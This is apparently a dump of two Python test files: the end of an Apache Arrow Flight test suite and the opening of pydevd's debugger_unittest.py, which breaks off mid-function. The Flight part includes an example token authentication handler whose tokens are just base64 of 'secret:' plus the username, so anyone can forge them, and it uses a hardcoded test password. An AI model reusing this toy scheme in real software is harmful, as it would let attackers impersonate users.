class EchoStreamFlightServer(EchoFlightServer):
    """An echo server that streams individual record batches."""

    def do_get(self, context, ticket):
        return flight.GeneratorStream(
            self.last_message.schema,
            self.last_message.to_batches(max_chunksize=1024))

    def list_actions(self, context):
        return []

    def do_action(self, context, action):
        if action.type == "who-am-i":
            return iter([flight.Result(context.peer_identity())])
        raise NotImplementedError


class GetInfoFlightServer(FlightServerBase):
    """A Flight server that tests GetFlightInfo."""

    def get_flight_info(self, context, descriptor):
        return flight.FlightInfo(
            pa.schema([('a', pa.int32())]),
            descriptor,
            [
                flight.FlightEndpoint(b'', ['grpc://test']),
                flight.FlightEndpoint(
                    b'',
                    [flight.Location.for_grpc_tcp('localhost', 5005)],
                ),
            ],
            -1,
            -1,
        )

    def get_schema(self, context, descriptor):
        info = self.get_flight_info(context, descriptor)
        return flight.SchemaResult(info.schema)


class ListActionsFlightServer(FlightServerBase):
    """A Flight server that tests ListActions."""

    @classmethod
    def expected_actions(cls):
        return [
            ("action-1", "description"),
            ("action-2", ""),
            flight.ActionType("action-3", "more detail"),
        ]

    def list_actions(self, context):
        for action in self.expected_actions():
            yield action


class ListActionsErrorFlightServer(FlightServerBase):
    """A Flight server that tests ListActions."""

    def list_actions(self, context):
        yield ("action-1", "")
        yield "foo"


class CheckTicketFlightServer(FlightServerBase):
    """A Flight server that compares the given ticket to an expected value."""

    def __init__(self, expected_ticket):
        super(CheckTicketFlightServer, self).__init__()
        self.expected_ticket = expected_ticket

    def do_get(self, context, ticket):
        assert self.expected_ticket == ticket.ticket
        data1 = [pa.array([-10, -5, 0, 5, 10], type=pa.int32())]
        table = pa.Table.from_arrays(data1, names=['a'])
        return flight.RecordBatchStream(table)

    def do_put(self, context, descriptor, reader):
        self.last_message = reader.read_all()


class InvalidStreamFlightServer(FlightServerBase):
    """A Flight server that tries to return messages with differing
schemas.""" schema = pa.schema([('a', pa.int32())]) def do_get(self, context, ticket): data1 = [pa.array([-10, -5, 0, 5, 10], type=pa.int32())] data2 = [pa.array([-10.0, -5.0, 0.0, 5.0, 10.0], type=pa.float64())] assert data1.type != data2.type table1 = pa.Table.from_arrays(data1, names=['a']) table2 = pa.Table.from_arrays(data2, names=['a']) assert table1.schema == self.schema return flight.GeneratorStream(self.schema, [table1, table2]) class SlowFlightServer(FlightServerBase): """A Flight server that delays its responses to test timeouts.""" def do_get(self, context, ticket): return flight.GeneratorStream(pa.schema([('a', pa.int32())]), self.slow_stream()) def do_action(self, context, action): time.sleep(0.5) return iter([]) @staticmethod def slow_stream(): data1 = [pa.array([-10, -5, 0, 5, 10], type=pa.int32())] yield pa.Table.from_arrays(data1, names=['a']) # The second message should never get sent; the client should # cancel before we send this time.sleep(10) yield pa.Table.from_arrays(data1, names=['a']) class ErrorFlightServer(FlightServerBase): """A Flight server that uses all the Flight-specific errors.""" def do_action(self, context, action): if action.type == "internal": raise flight.FlightInternalError("foo") elif action.type == "timedout": raise flight.FlightTimedOutError("foo") elif action.type == "cancel": raise flight.FlightCancelledError("foo") elif action.type == "unauthenticated": raise flight.FlightUnauthenticatedError("foo") elif action.type == "unauthorized": raise flight.FlightUnauthorizedError("foo") raise NotImplementedError def list_flights(self, context, criteria): yield flight.FlightInfo( pa.schema([]), flight.FlightDescriptor.for_path('/foo'), [], -1, -1 ) raise flight.FlightInternalError("foo") class HttpBasicServerAuthHandler(ServerAuthHandler): """An example implementation of HTTP basic authentication.""" def __init__(self, creds): super(HttpBasicServerAuthHandler, self).__init__() self.creds = creds def authenticate(self, outgoing, incoming): buf = incoming.read() auth = flight.BasicAuth.deserialize(buf) if auth.username not in self.creds: raise flight.FlightUnauthenticatedError("unknown user") if self.creds[auth.username] != auth.password: raise flight.FlightUnauthenticatedError("wrong password") outgoing.write(tobytes(auth.username)) def is_valid(self, token): if not token: raise flight.FlightUnauthenticatedError("token not provided") if token not in self.creds: raise flight.FlightUnauthenticatedError("unknown user") return token class HttpBasicClientAuthHandler(ClientAuthHandler): """An example implementation of HTTP basic authentication.""" def __init__(self, username, password): super(HttpBasicClientAuthHandler, self).__init__() self.basic_auth = flight.BasicAuth(username, password) self.token = None def authenticate(self, outgoing, incoming): auth = self.basic_auth.serialize() outgoing.write(auth) self.token = incoming.read() def get_token(self): return self.token class TokenServerAuthHandler(ServerAuthHandler): """An example implementation of authentication via handshake.""" def __init__(self, creds): super(TokenServerAuthHandler, self).__init__() self.creds = creds def authenticate(self, outgoing, incoming): username = incoming.read() password = incoming.read() if username in self.creds and self.creds[username] == password: outgoing.write(base64.b64encode(b'secret:' + username)) else: raise flight.FlightUnauthenticatedError( "invalid username/password") def is_valid(self, token): token = base64.b64decode(token) if not token.startswith(b'secret:'): 
raise flight.FlightUnauthenticatedError("invalid token") return token[7:] class TokenClientAuthHandler(ClientAuthHandler): """An example implementation of authentication via handshake.""" def __init__(self, username, password): super(TokenClientAuthHandler, self).__init__() self.username = username self.password = password self.token = b'' def authenticate(self, outgoing, incoming): outgoing.write(self.username) outgoing.write(self.password) self.token = incoming.read() def get_token(self): return self.token @contextlib.contextmanager def flight_server(server_base, *args, **kwargs): """Spawn a Flight server on a free port, shutting it down when done.""" auth_handler = kwargs.pop('auth_handler', None) tls_certificates = kwargs.pop('tls_certificates', None) location = kwargs.pop('location', None) try_connect = kwargs.pop('try_connect', True) connect_args = kwargs.pop('connect_args', {}) if location is None: # Find a free port sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) with contextlib.closing(sock) as sock: sock.bind(('', 0)) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) port = sock.getsockname()[1] ctor = flight.Location.for_grpc_tcp if tls_certificates: ctor = flight.Location.for_grpc_tls location = ctor("localhost", port) else: port = None ctor_kwargs = kwargs server_instance = server_base(*args, **ctor_kwargs) # The server instance needs to be initialized before shutdown() # can be called server_instance.init(location, auth_handler=auth_handler, tls_certificates=tls_certificates) def _server_thread(): server_instance.run() thread = threading.Thread(target=_server_thread, daemon=True) thread.start() # Wait for server to start if try_connect: deadline = time.time() + 5.0 client = flight.FlightClient.connect(location, **connect_args) while True: try: list(client.list_flights()) except Exception as e: if 'Connect Failed' in str(e): if time.time() < deadline: time.sleep(0.025) continue else: raise break try: yield location finally: server_instance.shutdown() thread.join(3.0) def test_flight_do_get_ints(): """Try a simple do_get call.""" table = simple_ints_table() with flight_server(ConstantFlightServer) as server_location: client = flight.FlightClient.connect(server_location) data = client.do_get(flight.Ticket(b'ints')).read_all() assert data.equals(table) @pytest.mark.pandas def test_do_get_ints_pandas(): """Try a simple do_get call.""" table = simple_ints_table() with flight_server(ConstantFlightServer) as server_location: client = flight.FlightClient.connect(server_location) data = client.do_get(flight.Ticket(b'ints')).read_pandas() assert list(data['some_ints']) == table.column(0).to_pylist() def test_flight_do_get_dicts(): table = simple_dicts_table() with flight_server(ConstantFlightServer) as server_location: client = flight.FlightClient.connect(server_location) data = client.do_get(flight.Ticket(b'dicts')).read_all() assert data.equals(table) def test_flight_do_get_ticket(): """Make sure Tickets get passed to the server.""" data1 = [pa.array([-10, -5, 0, 5, 10], type=pa.int32())] table = pa.Table.from_arrays(data1, names=['a']) with flight_server( CheckTicketFlightServer, expected_ticket=b'the-ticket', ) as server_location: client = flight.FlightClient.connect(server_location) data = client.do_get(flight.Ticket(b'the-ticket')).read_all() assert data.equals(table) def test_flight_get_info(): """Make sure FlightEndpoint accepts string and object URIs.""" with flight_server(GetInfoFlightServer) as server_location: client = 
flight.FlightClient.connect(server_location) info = client.get_flight_info(flight.FlightDescriptor.for_command(b'')) assert info.total_records == -1 assert info.total_bytes == -1 assert info.schema == pa.schema([('a', pa.int32())]) assert len(info.endpoints) == 2 assert len(info.endpoints[0].locations) == 1 assert info.endpoints[0].locations[0] == flight.Location('grpc://test') assert info.endpoints[1].locations[0] == \ flight.Location.for_grpc_tcp('localhost', 5005) def test_flight_get_schema(): """Make sure GetSchema returns correct schema.""" with flight_server(GetInfoFlightServer) as server_location: client = flight.FlightClient.connect(server_location) info = client.get_schema(flight.FlightDescriptor.for_command(b'')) assert info.schema == pa.schema([('a', pa.int32())]) def test_list_actions(): """Make sure the return type of ListActions is validated.""" # ARROW-6392 with flight_server(ListActionsErrorFlightServer) as server_location: client = flight.FlightClient.connect(server_location) with pytest.raises(pa.ArrowException, match=".*unknown error.*"): list(client.list_actions()) with flight_server(ListActionsFlightServer) as server_location: client = flight.FlightClient.connect(server_location) assert list(client.list_actions()) == \ ListActionsFlightServer.expected_actions() @pytest.mark.skipif(os.name == 'nt', reason="Unix sockets can't be tested on Windows") def test_flight_domain_socket(): """Try a simple do_get call over a Unix domain socket.""" with tempfile.NamedTemporaryFile() as sock: sock.close() location = flight.Location.for_grpc_unix(sock.name) with flight_server(ConstantFlightServer, location=location) as server_location: client = flight.FlightClient.connect(server_location) reader = client.do_get(flight.Ticket(b'ints')) table = simple_ints_table() assert reader.schema.equals(table.schema) data = reader.read_all() assert data.equals(table) reader = client.do_get(flight.Ticket(b'dicts')) table = simple_dicts_table() assert reader.schema.equals(table.schema) data = reader.read_all() assert data.equals(table) @pytest.mark.slow def test_flight_large_message(): """Try sending/receiving a large message via Flight. See ARROW-4421: by default, gRPC won't allow us to send messages > 4MiB in size. 
""" data = pa.Table.from_arrays([ pa.array(range(0, 10 * 1024 * 1024)) ], names=['a']) with flight_server(EchoFlightServer, expected_schema=data.schema) as server_location: client = flight.FlightClient.connect(server_location) writer, _ = client.do_put(flight.FlightDescriptor.for_path('test'), data.schema) # Write a single giant chunk writer.write_table(data, 10 * 1024 * 1024) writer.close() result = client.do_get(flight.Ticket(b'')).read_all() assert result.equals(data) def test_flight_generator_stream(): """Try downloading a flight of RecordBatches in a GeneratorStream.""" data = pa.Table.from_arrays([ pa.array(range(0, 10 * 1024)) ], names=['a']) with flight_server(EchoStreamFlightServer) as server_location: client = flight.FlightClient.connect(server_location) writer, _ = client.do_put(flight.FlightDescriptor.for_path('test'), data.schema) writer.write_table(data) writer.close() result = client.do_get(flight.Ticket(b'')).read_all() assert result.equals(data) def test_flight_invalid_generator_stream(): """Try streaming data with mismatched schemas.""" with flight_server(InvalidStreamFlightServer) as server_location: client = flight.FlightClient.connect(server_location) with pytest.raises(pa.ArrowException): client.do_get(flight.Ticket(b'')).read_all() def test_timeout_fires(): """Make sure timeouts fire on slow requests.""" # Do this in a separate thread so that if it fails, we don't hang # the entire test process with flight_server(SlowFlightServer) as server_location: client = flight.FlightClient.connect(server_location) action = flight.Action("", b"") options = flight.FlightCallOptions(timeout=0.2) # gRPC error messages change based on version, so don't look # for a particular error with pytest.raises(flight.FlightTimedOutError): list(client.do_action(action, options=options)) def test_timeout_passes(): """Make sure timeouts do not fire on fast requests.""" with flight_server(ConstantFlightServer) as server_location: client = flight.FlightClient.connect(server_location) options = flight.FlightCallOptions(timeout=5.0) client.do_get(flight.Ticket(b'ints'), options=options).read_all() basic_auth_handler = HttpBasicServerAuthHandler(creds={ b"test": b"p4ssw0rd", }) token_auth_handler = TokenServerAuthHandler(creds={ b"test": b"p4ssw0rd", }) @pytest.mark.slow def test_http_basic_unauth(): """Test that auth fails when not authenticated.""" with flight_server(EchoStreamFlightServer, auth_handler=basic_auth_handler) as server_location: client = flight.FlightClient.connect(server_location) action = flight.Action("who-am-i", b"") with pytest.raises(flight.FlightUnauthenticatedError, match=".*unauthenticated.*"): list(client.do_action(action)) def test_http_basic_auth(): """Test a Python implementation of HTTP basic authentication.""" with flight_server(EchoStreamFlightServer, auth_handler=basic_auth_handler) as server_location: client = flight.FlightClient.connect(server_location) action = flight.Action("who-am-i", b"") client.authenticate(HttpBasicClientAuthHandler('test', 'p4ssw0rd')) identity = next(client.do_action(action)) assert identity.body.to_pybytes() == b'test' def test_http_basic_auth_invalid_password(): """Test that auth fails with the wrong password.""" with flight_server(EchoStreamFlightServer, auth_handler=basic_auth_handler) as server_location: client = flight.FlightClient.connect(server_location) action = flight.Action("who-am-i", b"") with pytest.raises(flight.FlightUnauthenticatedError, match=".*wrong password.*"): client.authenticate(HttpBasicClientAuthHandler('test', 
'wrong')) next(client.do_action(action)) def test_token_auth(): """Test an auth mechanism that uses a handshake.""" with flight_server(EchoStreamFlightServer, auth_handler=token_auth_handler) as server_location: client = flight.FlightClient.connect(server_location) action = flight.Action("who-am-i", b"") client.authenticate(TokenClientAuthHandler('test', 'p4ssw0rd')) identity = next(client.do_action(action)) assert identity.body.to_pybytes() == b'test' def test_token_auth_invalid(): """Test an auth mechanism that uses a handshake.""" with flight_server(EchoStreamFlightServer, auth_handler=token_auth_handler) as server_location: client = flight.FlightClient.connect(server_location) with pytest.raises(flight.FlightUnauthenticatedError): client.authenticate(TokenClientAuthHandler('test', 'wrong')) def test_location_invalid(): """Test constructing invalid URIs.""" with pytest.raises(pa.ArrowInvalid, match=".*Cannot parse URI:.*"): flight.FlightClient.connect("%") server = ConstantFlightServer() with pytest.raises(pa.ArrowInvalid, match=".*Cannot parse URI:.*"): server.init("%") def test_location_unknown_scheme(): """Test creating locations for unknown schemes.""" assert flight.Location("s3://foo").uri == b"s3://foo" assert flight.Location("https://example.com/bar.parquet").uri == \ b"https://example.com/bar.parquet" @pytest.mark.slow @pytest.mark.requires_testing_data def test_tls_fails(): """Make sure clients cannot connect when cert verification fails.""" certs = example_tls_certs() with flight_server( ConstantFlightServer, tls_certificates=certs["certificates"], connect_args=dict(tls_root_certs=certs["root_cert"]), ) as server_location: # Ensure client doesn't connect when certificate verification # fails (this is a slow test since gRPC does retry a few times) client = flight.FlightClient.connect(server_location) # gRPC error messages change based on version, so don't look # for a particular error with pytest.raises(flight.FlightUnavailableError): client.do_get(flight.Ticket(b'ints')) @pytest.mark.requires_testing_data def test_tls_do_get(): """Try a simple do_get call over TLS.""" table = simple_ints_table() certs = example_tls_certs() with flight_server( ConstantFlightServer, tls_certificates=certs["certificates"], connect_args=dict(tls_root_certs=certs["root_cert"]), ) as server_location: client = flight.FlightClient.connect( server_location, tls_root_certs=certs["root_cert"]) data = client.do_get(flight.Ticket(b'ints')).read_all() assert data.equals(table) @pytest.mark.requires_testing_data def test_tls_override_hostname(): """Check that incorrectly overriding the hostname fails.""" certs = example_tls_certs() with flight_server( ConstantFlightServer, tls_certificates=certs["certificates"], connect_args=dict(tls_root_certs=certs["root_cert"]), ) as server_location: client = flight.FlightClient.connect( server_location, tls_root_certs=certs["root_cert"], override_hostname="fakehostname") with pytest.raises(flight.FlightUnavailableError): client.do_get(flight.Ticket(b'ints')) def test_flight_do_get_metadata(): """Try a simple do_get call with metadata.""" data = [ pa.array([-10, -5, 0, 5, 10]) ] table = pa.Table.from_arrays(data, names=['a']) batches = [] with flight_server(MetadataFlightServer) as server_location: client = flight.FlightClient.connect(server_location) reader = client.do_get(flight.Ticket(b'')) idx = 0 while True: try: batch, metadata = reader.read_chunk() batches.append(batch) server_idx, = struct.unpack('<i', metadata.to_pybytes()) assert idx == server_idx idx += 1 
except StopIteration: break data = pa.Table.from_batches(batches) assert data.equals(table) def test_flight_do_put_metadata(): """Try a simple do_put call with metadata.""" data = [ pa.array([-10, -5, 0, 5, 10]) ] table = pa.Table.from_arrays(data, names=['a']) with flight_server(MetadataFlightServer) as server_location: client = flight.FlightClient.connect(server_location) writer, metadata_reader = client.do_put( flight.FlightDescriptor.for_path(''), table.schema) with writer: for idx, batch in enumerate(table.to_batches(max_chunksize=1)): metadata = struct.pack('<i', idx) writer.write_with_metadata(batch, metadata) buf = metadata_reader.read() assert buf is not None server_idx, = struct.unpack('<i', buf.to_pybytes()) assert idx == server_idx @pytest.mark.slow def test_cancel_do_get(): """Test canceling a DoGet operation on the client side.""" with flight_server(ConstantFlightServer) as server_location: client = flight.FlightClient.connect(server_location) reader = client.do_get(flight.Ticket(b'ints')) reader.cancel() with pytest.raises(flight.FlightCancelledError, match=".*Cancel.*"): reader.read_chunk() @pytest.mark.slow def test_cancel_do_get_threaded(): """Test canceling a DoGet operation from another thread.""" with flight_server(SlowFlightServer) as server_location: client = flight.FlightClient.connect(server_location) reader = client.do_get(flight.Ticket(b'ints')) read_first_message = threading.Event() stream_canceled = threading.Event() result_lock = threading.Lock() raised_proper_exception = threading.Event() def block_read(): reader.read_chunk() read_first_message.set() stream_canceled.wait(timeout=5) try: reader.read_chunk() except flight.FlightCancelledError: with result_lock: raised_proper_exception.set() thread = threading.Thread(target=block_read, daemon=True) thread.start() read_first_message.wait(timeout=5) reader.cancel() stream_canceled.set() thread.join(timeout=1) with result_lock: assert raised_proper_exception.is_set() def test_roundtrip_types(): """Make sure serializable types round-trip.""" ticket = flight.Ticket("foo") assert ticket == flight.Ticket.deserialize(ticket.serialize()) desc = flight.FlightDescriptor.for_command("test") assert desc == flight.FlightDescriptor.deserialize(desc.serialize()) desc = flight.FlightDescriptor.for_path("a", "b", "test.arrow") assert desc == flight.FlightDescriptor.deserialize(desc.serialize()) info = flight.FlightInfo( pa.schema([('a', pa.int32())]), desc, [ flight.FlightEndpoint(b'', ['grpc://test']), flight.FlightEndpoint( b'', [flight.Location.for_grpc_tcp('localhost', 5005)], ), ], -1, -1, ) info2 = flight.FlightInfo.deserialize(info.serialize()) assert info.schema == info2.schema assert info.descriptor == info2.descriptor assert info.total_bytes == info2.total_bytes assert info.total_records == info2.total_records assert info.endpoints == info2.endpoints def test_roundtrip_errors(): """Ensure that Flight errors propagate from server to client.""" with flight_server(ErrorFlightServer) as server_location: client = flight.FlightClient.connect(server_location) with pytest.raises(flight.FlightInternalError, match=".*foo.*"): list(client.do_action(flight.Action("internal", b""))) with pytest.raises(flight.FlightTimedOutError, match=".*foo.*"): list(client.do_action(flight.Action("timedout", b""))) with pytest.raises(flight.FlightCancelledError, match=".*foo.*"): list(client.do_action(flight.Action("cancel", b""))) with pytest.raises(flight.FlightUnauthenticatedError, match=".*foo.*"): 
list(client.do_action(flight.Action("unauthenticated", b""))) with pytest.raises(flight.FlightUnauthorizedError, match=".*foo.*"): list(client.do_action(flight.Action("unauthorized", b""))) with pytest.raises(flight.FlightInternalError, match=".*foo.*"): list(client.list_flights()) def test_do_put_independent_read_write(): """Ensure that separate threads can read/write on a DoPut.""" # ARROW-6063: previously this would cause gRPC to abort when the # writer was closed (due to simultaneous reads), or would hang # forever. data = [ pa.array([-10, -5, 0, 5, 10]) ] table = pa.Table.from_arrays(data, names=['a']) with flight_server(MetadataFlightServer) as server_location: client = flight.FlightClient.connect(server_location) writer, metadata_reader = client.do_put( flight.FlightDescriptor.for_path(''), table.schema) count = [0] def _reader_thread(): while metadata_reader.read() is not None: count[0] += 1 thread = threading.Thread(target=_reader_thread) thread.start() batches = table.to_batches(max_chunksize=1) with writer: for idx, batch in enumerate(batches): metadata = struct.pack('<i', idx) writer.write_with_metadata(batch, metadata) # Causes the server to stop writing and end the call writer.done_writing() # Thus reader thread will break out of loop thread.join() # writer.close() won't segfault since reader thread has # stopped assert count[0] == len(batches)
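# Illustrative sketch only (not part of the test suite): a minimal client round
# trip using the flight_server fixture and ConstantFlightServer defined earlier
# in this file, mirroring what test_tls_do_get and test_roundtrip_* above do --
# connect, fetch the 'ints' ticket, and drain the stream into a pyarrow.Table.
def _example_do_get_roundtrip():
    with flight_server(ConstantFlightServer) as server_location:
        client = flight.FlightClient.connect(server_location)
        reader = client.do_get(flight.Ticket(b'ints'))
        table = reader.read_all()  # read every record batch into one Table
        return table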
debugger_unittest.py
from collections import namedtuple from contextlib import contextmanager import json try: from urllib import quote, quote_plus, unquote_plus except ImportError: from urllib.parse import quote, quote_plus, unquote_plus # @UnresolvedImport import re import socket import subprocess import threading import time import traceback from tests_python.debug_constants import * from _pydev_bundle import pydev_localhost, pydev_log # Note: copied (don't import because we want it to be independent on the actual code because of backward compatibility). CMD_RUN = 101 CMD_LIST_THREADS = 102 CMD_THREAD_CREATE = 103 CMD_THREAD_KILL = 104 CMD_THREAD_SUSPEND = 105 CMD_THREAD_RUN = 106 CMD_STEP_INTO = 107 CMD_STEP_OVER = 108 CMD_STEP_RETURN = 109 CMD_GET_VARIABLE = 110 CMD_SET_BREAK = 111 CMD_REMOVE_BREAK = 112 CMD_EVALUATE_EXPRESSION = 113 CMD_GET_FRAME = 114 CMD_EXEC_EXPRESSION = 115 CMD_WRITE_TO_CONSOLE = 116 CMD_CHANGE_VARIABLE = 117 CMD_RUN_TO_LINE = 118 CMD_RELOAD_CODE = 119 CMD_GET_COMPLETIONS = 120 # Note: renumbered (conflicted on merge) CMD_CONSOLE_EXEC = 121 CMD_ADD_EXCEPTION_BREAK = 122 CMD_REMOVE_EXCEPTION_BREAK = 123 CMD_LOAD_SOURCE = 124 CMD_ADD_DJANGO_EXCEPTION_BREAK = 125 CMD_REMOVE_DJANGO_EXCEPTION_BREAK = 126 CMD_SET_NEXT_STATEMENT = 127 CMD_SMART_STEP_INTO = 128 CMD_EXIT = 129 CMD_SIGNATURE_CALL_TRACE = 130 CMD_SET_PY_EXCEPTION = 131 CMD_GET_FILE_CONTENTS = 132 CMD_SET_PROPERTY_TRACE = 133 # Pydev debug console commands CMD_EVALUATE_CONSOLE_EXPRESSION = 134 CMD_RUN_CUSTOM_OPERATION = 135 CMD_GET_BREAKPOINT_EXCEPTION = 136 CMD_STEP_CAUGHT_EXCEPTION = 137 CMD_SEND_CURR_EXCEPTION_TRACE = 138 CMD_SEND_CURR_EXCEPTION_TRACE_PROCEEDED = 139 CMD_IGNORE_THROWN_EXCEPTION_AT = 140 CMD_ENABLE_DONT_TRACE = 141 CMD_SHOW_CONSOLE = 142 CMD_GET_ARRAY = 143 CMD_STEP_INTO_MY_CODE = 144 CMD_GET_CONCURRENCY_EVENT = 145 CMD_SHOW_RETURN_VALUES = 146 CMD_GET_THREAD_STACK = 152 CMD_THREAD_DUMP_TO_STDERR = 153 # This is mostly for unit-tests to diagnose errors on ci. CMD_STOP_ON_START = 154 CMD_GET_EXCEPTION_DETAILS = 155 CMD_PYDEVD_JSON_CONFIG = 156 CMD_THREAD_SUSPEND_SINGLE_NOTIFICATION = 157 CMD_THREAD_RESUME_SINGLE_NOTIFICATION = 158 CMD_STEP_OVER_MY_CODE = 159 CMD_STEP_RETURN_MY_CODE = 160 CMD_SET_PY_EXCEPTION = 161 CMD_REDIRECT_OUTPUT = 200 CMD_GET_NEXT_STATEMENT_TARGETS = 201 CMD_SET_PROJECT_ROOTS = 202 CMD_AUTHENTICATE = 205 CMD_VERSION = 501 CMD_RETURN = 502 CMD_SET_PROTOCOL = 503 CMD_ERROR = 901 REASON_CAUGHT_EXCEPTION = CMD_STEP_CAUGHT_EXCEPTION REASON_UNCAUGHT_EXCEPTION = CMD_ADD_EXCEPTION_BREAK REASON_STOP_ON_BREAKPOINT = CMD_SET_BREAK REASON_THREAD_SUSPEND = CMD_THREAD_SUSPEND REASON_STEP_INTO = CMD_STEP_INTO REASON_STEP_INTO_MY_CODE = CMD_STEP_INTO_MY_CODE REASON_STOP_ON_START = CMD_STOP_ON_START REASON_STEP_RETURN = CMD_STEP_RETURN REASON_STEP_RETURN_MY_CODE = CMD_STEP_RETURN_MY_CODE REASON_STEP_OVER = CMD_STEP_OVER REASON_STEP_OVER_MY_CODE = CMD_STEP_OVER_MY_CODE # Always True (because otherwise when we do have an error, it's hard to diagnose). 
SHOW_WRITES_AND_READS = True SHOW_OTHER_DEBUG_INFO = True SHOW_STDOUT = True import platform IS_CPYTHON = platform.python_implementation() == 'CPython' IS_IRONPYTHON = platform.python_implementation() == 'IronPython' IS_JYTHON = platform.python_implementation() == 'Jython' IS_PYPY = platform.python_implementation() == 'PyPy' IS_APPVEYOR = os.environ.get('APPVEYOR', '') in ('True', 'true', '1') try: from thread import start_new_thread except ImportError: from _thread import start_new_thread # @UnresolvedImport try: xrange except: xrange = range Hit = namedtuple('Hit', 'thread_id, frame_id, line, suspend_type, name, file') def overrides(method): ''' Helper to check that one method overrides another (redeclared in unit-tests to avoid importing pydevd). ''' def wrapper(func): if func.__name__ != method.__name__: msg = "Wrong @override: %r expected, but overwriting %r." msg = msg % (func.__name__, method.__name__) raise AssertionError(msg) if func.__doc__ is None: func.__doc__ = method.__doc__ return func return wrapper TIMEOUT = 20 try: TimeoutError = TimeoutError # @ReservedAssignment except NameError: class TimeoutError(RuntimeError): # @ReservedAssignment pass def wait_for_condition(condition, msg=None, timeout=TIMEOUT, sleep=.05): curtime = time.time() while True: if condition(): break if time.time() - curtime > timeout: error_msg = 'Condition not reached in %s seconds' % (timeout,) if msg is not None: error_msg += '\n' if callable(msg): error_msg += msg() else: error_msg += str(msg) raise TimeoutError(error_msg) time.sleep(sleep) class IgnoreFailureError(RuntimeError): pass #======================================================================================================================= # ReaderThread #======================================================================================================================= class ReaderThread(threading.Thread): MESSAGES_TIMEOUT = 15 def __init__(self, sock): threading.Thread.__init__(self) self.name = 'Test Reader Thread' try: from queue import Queue except ImportError: from Queue import Queue self.setDaemon(True) self._buffer = b'' self.sock = sock self._queue = Queue() self._kill = False self.accept_xml_messages = True def set_messages_timeout(self, timeout): self.MESSAGES_TIMEOUT = timeout def get_next_message(self, context_message, timeout=None): if timeout is None: timeout = self.MESSAGES_TIMEOUT try: msg = self._queue.get(block=True, timeout=timeout) except: raise TimeoutError('No message was written in %s seconds. Error message:\n%s' % (timeout, context_message,)) else: frame = sys._getframe().f_back.f_back frame_info = '' while frame: if not frame.f_code.co_name.startswith('test_'): frame = frame.f_back continue if frame.f_code.co_filename.endswith('debugger_unittest.py'): frame = frame.f_back continue stack_msg = ' -- File "%s", line %s, in %s\n' % (frame.f_code.co_filename, frame.f_lineno, frame.f_code.co_name) if 'run' == frame.f_code.co_name: frame_info = stack_msg # Ok, found the writer thread 'run' method (show only that). break frame_info += stack_msg frame = frame.f_back # Just print the first which is not debugger_unittest.py break frame = None sys.stdout.write('Message returned in get_next_message(): %s -- ctx: %s, asked at:\n%s\n' % (unquote_plus(unquote_plus(msg)), context_message, frame_info)) if not self.accept_xml_messages: if '<xml' in msg: raise AssertionError('Xml messages disabled. 
Received: %s' % (msg,)) return msg def _read(self, size): while True: buffer_len = len(self._buffer) if buffer_len == size: ret = self._buffer self._buffer = b'' return ret if buffer_len > size: ret = self._buffer[:size] self._buffer = self._buffer[size:] return ret r = self.sock.recv(max(size - buffer_len, 1024)) if not r: return b'' self._buffer += r def _read_line(self): while True: i = self._buffer.find(b'\n') if i != -1: i += 1 # Add the newline to the return ret = self._buffer[:i] self._buffer = self._buffer[i:] return ret else: r = self.sock.recv(1024) if not r: return b'' self._buffer += r def run(self): try: content_len = -1 while not self._kill: line = self._read_line() if not line: break if SHOW_WRITES_AND_READS: show_line = line if IS_PY3K: show_line = line.decode('utf-8') print('%s Received %s' % (self.name, show_line,)) if line.startswith(b'Content-Length:'): content_len = int(line.strip().split(b':', 1)[1]) continue if content_len != -1: # If we previously received a content length, read until a '\r\n'. if line == b'\r\n': json_contents = self._read(content_len) content_len = -1 if len(json_contents) == 0: self.handle_except() return # Finished communication. msg = json_contents if IS_PY3K: msg = msg.decode('utf-8') print('Test Reader Thread Received %s' % (msg,)) self._queue.put(msg) continue else: # No content len, regular line-based protocol message (remove trailing new-line). if line.endswith(b'\n\n'): line = line[:-2] elif line.endswith(b'\n'): line = line[:-1] elif line.endswith(b'\r'): line = line[:-1] msg = line if IS_PY3K: msg = msg.decode('utf-8') print('Test Reader Thread Received %s' % (msg,)) self._queue.put(msg) except: pass # ok, finished it finally: # When the socket from pydevd is closed the client should shutdown to notify # it acknowledged it. try: self.sock.shutdown(socket.SHUT_RDWR) except: pass try: self.sock.close() except: pass def do_kill(self): self._kill = True if hasattr(self, 'sock'): from socket import SHUT_RDWR try: self.sock.shutdown(SHUT_RDWR) except: pass try: self.sock.close() except: pass delattr(self, 'sock') def read_process(stream, buffer, debug_stream, stream_name, finish): while True: line = stream.readline() if not line: break if IS_PY3K: line = line.decode('utf-8', errors='replace') if SHOW_STDOUT: debug_stream.write('%s: %s' % (stream_name, line,)) buffer.append(line) if finish[0]: return def start_in_daemon_thread(target, args): t0 = threading.Thread(target=target, args=args) t0.setDaemon(True) t0.start() class DebuggerRunner(object): def __init__(self, tmpdir): if tmpdir is not None: self.pydevd_debug_file = os.path.join(str(tmpdir), 'pydevd_debug_file_%s.txt' % (os.getpid(),)) else: self.pydevd_debug_file = None def get_command_line(self): ''' Returns the base command line (i.e.: ['python.exe', '-u']) ''' raise NotImplementedError def add_command_line_args(self, args): writer = self.writer port = int(writer.port) localhost = pydev_localhost.get_localhost() ret = [ writer.get_pydevd_file(), '--DEBUG_RECORD_SOCKET_READS', ] if not IS_PY36_OR_GREATER or not IS_CPYTHON or not TEST_CYTHON: # i.e.: in frame-eval mode we support native threads, whereas # on other cases we need the qt monkeypatch. 
ret += ['--qt-support'] ret += [ '--client', localhost, '--port', str(port), ] if writer.IS_MODULE: ret += ['--module'] ret += ['--file'] + writer.get_command_line_args() ret = writer.update_command_line_args(ret) # Provide a hook for the writer return args + ret @contextmanager def check_case(self, writer_class, wait_for_port=True): try: if callable(writer_class): writer = writer_class() else: writer = writer_class try: writer.start() if wait_for_port: wait_for_condition(lambda: hasattr(writer, 'port')) self.writer = writer args = self.get_command_line() args = self.add_command_line_args(args) if SHOW_OTHER_DEBUG_INFO: print('executing: %s' % (' '.join(args),)) with self.run_process(args, writer) as dct_with_stdout_stder: try: if wait_for_port: wait_for_condition(lambda: writer.finished_initialization) except TimeoutError: sys.stderr.write('Timed out waiting for initialization\n') sys.stderr.write('stdout:\n%s\n\nstderr:\n%s\n' % ( ''.join(dct_with_stdout_stder['stdout']), ''.join(dct_with_stdout_stder['stderr']), )) raise finally: writer.get_stdout = lambda: ''.join(dct_with_stdout_stder['stdout']) writer.get_stderr = lambda: ''.join(dct_with_stdout_stder['stderr']) yield writer finally: writer.do_kill() writer.log = [] 